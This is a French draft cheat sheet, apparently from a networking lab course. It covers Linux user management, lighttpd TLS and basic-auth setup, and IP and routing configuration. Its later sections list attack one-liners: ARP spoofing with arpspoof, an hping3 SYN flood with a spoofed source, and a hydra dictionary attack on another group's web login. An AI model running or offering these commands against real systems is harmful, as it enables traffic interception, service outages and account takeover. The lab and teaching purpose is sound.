This is a draft cheat sheet. It is a work in progress and is not finished yet.
Gestion des utilisateurs
Gestion des utilisateurs |
Gestion du système |
passwd <login> |
hostname <name> |
adduser <login> |
reboot |
login <login> |
Sécurisation du serveur web grâce à SSL/TLS
Génération des certificats du site |
Configuration du site web |
mkdir /etc/lighttpd/security |
/etc/lighttpd/conf- enabled/tls.conf server.modules += ("mod_openssl") $SERVER["socket"] == "" { ssl.engine = "enable" ssl.pemfile = "/etc/lighttpd/security/alcest.pem" } |
cd /etc/lighttpd/security |
echo "<username>:$(busybox httpd -m '<password>')" > <auth file> |
openssl req -new -newkey rsa:4096 -x509 -sha256 -days 365 \ -nodes -out alcest.crt -keyout alcest.key |
server.modules += ( "mod_auth", "mod_authn_file") auth.backend = "htpasswd" auth.backend.htpasswd.userfile = "/etc/lighttpd/security/alcest.auth" auth.require = ( "/" => ( "method" => "basic", "realm" => "password required", "require" => "valid-user" ) ) |
openssl x509 -in alcest.crt -text |
systemctl start lighttpd |
cat alcest.key alcest.crt > alcest.pem |
systemctl status lighttpd |
poweroff |
Administration de réseaux locaux
Configuration dynamique |
Configuration Statique |
Mise en place d’un serveur web |
ifconfig |
/etc/network/interfaces auto eth0 iface eth0 inet static address netmask gateway |
startx |
ifconfig -a |
ifup eth0 |
busybox httpd -f -vv -h /var/www/html |
ifconfig <iface> <@IP> netmask <netmask> |
ifdown eth0 |
/etc/hosts |
ifconfig <iface> up |
up echo 1 > /proc/sys/net/ipv4/ip_forward |
ifconfig <iface> down |
ip -br addr |
ip addr add <@IP>/<netmask> dev <iface> |
ip link set <iface> up |
ip link set <iface> down |
route -n |
route add default gw <@IP passerelle> |
route del default gw <@IP passerelle> |
ip route |
ip route add default via <@IP passerelle> |
ip route del default via <@IP passerelle> |
route add -net <@IP réseau> netmask <netmask> gw <@IP passerelle> |
ip route add <@IP réseau>/<netmask> via <@IP passerelle> |
ssh <login>@<destination> |
traceroute <destination> |
ping |
Man In The Middle
Le protocole ARP |
arp -n |
ip neigh |
arpspoof -t <@IP machine qui va se faire pwned> <@IP machine dont on souhaite usurper l'identité> |
wireshark -i eth0 -k |
echo "/:<username>:$(busybox httpd -m '<password>')" > /etc/httpd.conf |
busybox httpd -f -vv -h /var/www/html -r "Restricted Area:" -c /etc/httpd.conf |
Deny Of Service
Attaque |
hping3 --flood --syn --spoof <@IP source usurpée> <@IP victime> |
Réseau étendu
Création du réseau |
Attaque par dictionnaire |
/sbin/ifconfig |
most <file> |
/mnt/netta/apps/vnet/nemu-vnet netadm |
hydra -V -f -l admin -P <fichier de mots de passe> http-get://<IP nightwish de l'autre groupe> |
[nemu]-> slink() |
[nemu]-> clink('<@IP du groupe principal>') |